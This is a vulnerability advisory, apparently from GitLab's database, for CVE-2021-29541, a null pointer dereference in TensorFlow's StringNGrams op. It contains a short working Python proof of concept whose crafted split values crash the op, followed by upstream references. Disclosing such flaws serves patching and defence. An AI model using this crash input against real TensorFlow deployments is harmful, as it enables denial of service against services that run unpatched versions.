CVE-2021-29541: Null pointer dereference in `StringNGrams`
(updated )
An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams:
import tensorflow as tf
data=tf.constant([''] * 11, shape=[11], dtype=tf.string)
splits = [0]*115
splits.append(3)
data_splits=tf.constant(splits, shape=[116], dtype=tf.int64)
tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss',
ngram_widths=[7,6,11],
left_pad='ABCDE', right_pad=b'ZYXWVU',
pad_width=50, preserve_short_sequences=True)
References
- github.com/advisories/GHSA-xqfj-35wv-m3cr
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-469.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-667.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-178.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-xqfj-35wv-m3cr
- nvd.nist.gov/vuln/detail/CVE-2021-29541
Detect and mitigate CVE-2021-29541 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →